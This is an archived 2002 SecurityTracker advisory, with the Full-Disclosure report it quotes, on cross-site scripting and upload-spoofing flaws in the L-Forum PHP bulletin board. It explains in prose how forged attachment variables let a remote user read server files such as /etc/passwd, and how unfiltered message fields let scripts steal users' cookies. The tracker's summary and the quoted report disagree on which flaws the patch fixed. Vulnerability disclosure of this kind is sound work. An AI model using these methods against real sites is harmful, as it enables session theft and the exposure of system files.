L-Forum Bulletin Board Input Validation Holes Let Remote Users View Files on the System and Conduct Cross-Site Scripting Attacks Against L-Forum Users
SecurityTracker Alert ID: 1005040|
SecurityTracker URL: http://securitytracker.com/id/1005040
(Links to External Site)
Date: Aug 14 2002
Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network|
Fix Available: Yes Vendor Confirmed: Yes |
Several vulnerabilities were reported in the L-Forum bulletin board software. A remote user can view files on the server and can conduct cross-site scripting attacks against L-Forum users.|
In two vulnerabilities, the software fails to filter user-supplied input, allowing remote users to conduct cross-site scripting attacks. If the L-Forum "Enable HTML in messages" Administration option is set to "on", the system will display user-supplied HTML in the From, E-Mail, Subject, and Body fields of messages. When the option is set to "off", the system will still display HTML code in the From, E-mail, and Subject fields.
A remote user can submit a specially crafted message that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the L-Forum site and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A separate vulnerability allows remote users to view files on the system. The file upload function reportedly does not verify that the attachment, attachment_name, attachment_size and attachment_type variables were set during a file upload instead of during a POST submission. A remote user can set the variables to point to any file on the system so that the server will interpret a local file as an uploaded file. This allows a remote user to view any file on the system that is readable by the web server process.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with a site running L-Forum, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.|
A remote user can also view files on the system that are readable by the web server.
The vendor has released a fix, available at:|
The vendor also reports that version 2.4.1 will include a fix.
The author of the report notes that the fix only corrected the cross-site scriptin flaws and not the file viewing (file upload) flaw.
Vendor URL: l-forum.x-php.net/ (Links to External Site)
Access control error, Input validation error|
|Underlying OS: Linux (Any), UNIX (Any), Windows (Any)|
|Underlying OS Comments: PHP-based|
Source Message Contents
Subject: [Full-Disclosure] L-Forum XSS and upload spoofing|
L-Forum XSS and upload spoofing
VENDOR: Leszek Krupinski <email@example.com>
VULNERABLE VERSIONS: 2.4.0, possibly others
IMMUNE VERSIONS: none, but an official patch is available for
LOGIN REQUIRED: no
"L-Forum is [a] universal Web forum written in PHP. It has support
for threading, multiple languages, and the PostgreSQL/MySQL database
server. You can also easily change its design, or even change design
on-the-fly with themes support."
(direct quote from the program's project page at Freshmeat)
L-Forum is published under the terms of the GNU General Public
L-Forum has got two different XSS (Cross-Site Scripting) holes,
in a forum. It has also got an upload spoofing hole, indirectly
allowing an attacker to download any file on the server that the
httpd daemon can read.
1) If "Enable HTML in messages" is set to on in L-Forum
Administration, the users are exposed to several XSS (Cross-Site
Scripting) holes every time they read a message. If it is on, all
parts of a message (the From, E-Mail, Subject and Body fields)
may contain all kinds of HTML code, including script tags that
that redirect you to Gobbles' homepage.
2) When "Enable HTML in messages" is set to off in L-Forum
Administration, HTML code is only removed from the Body, and not
from the From, E-mail and Subject fields.
3) The file upload function allows uploads to occur, without checking
if the four global variables with information about an upload
(attachment, attachment_name, attachment_size and attachment_type)
really were set by uploading a file or if they were normal POST
data. This means that it can be fooled into treating any file that
the web server can read (like /etc/passwd) as the uploaded file.
COMMUNICATION WITH VENDOR:
The vendor was contacted on the 9th of July. He replied very quickly,
and posted an official patch that fixes problems number 2 and 3,
but not number 1, on the program's homepage. There is no official
new release yet, but if you apply the patch and turn off "Enable
HTML in messages" in L-Forum Administration, you are immune to all
// Ulf Harnhammar
Full-Disclosure - We believe in it.
Go to the Top of This SecurityTracker Archive Page